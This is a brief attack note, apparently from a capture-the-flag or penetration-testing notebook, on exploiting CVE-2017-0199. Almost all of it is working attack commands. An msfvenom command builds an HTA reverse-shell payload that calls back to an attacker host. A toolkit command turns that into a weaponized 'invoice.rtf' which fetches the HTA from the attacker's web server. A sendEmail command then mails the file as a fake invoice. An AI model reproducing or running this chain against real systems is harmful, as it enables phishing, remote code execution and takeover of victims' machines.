Sending Malicious RTF

CVE-2017-0199

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.19 LPORT=4444 -f hta-psh -o msfv.hta

python2 ../cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.16.19/shell.hta -t rtf -x 0
Generating normal RTF payload.

Generated invoice.rtf successfully

Here,

-M gen - generate document
-w invoice.rtf - output file name
-u http://10.10.14.3/shell.hta - url to get the hta from
-t rtf - create rtf document (as opposed to ppsx)
-x 0 - disable rtf obfuscation
sendEmail -f [email protected] -t [email protected] -u "Invoice Attached" -m "ABD CDJ JSCSC" -a invoice.rtf -s 10.10.10.77 -v

Last updated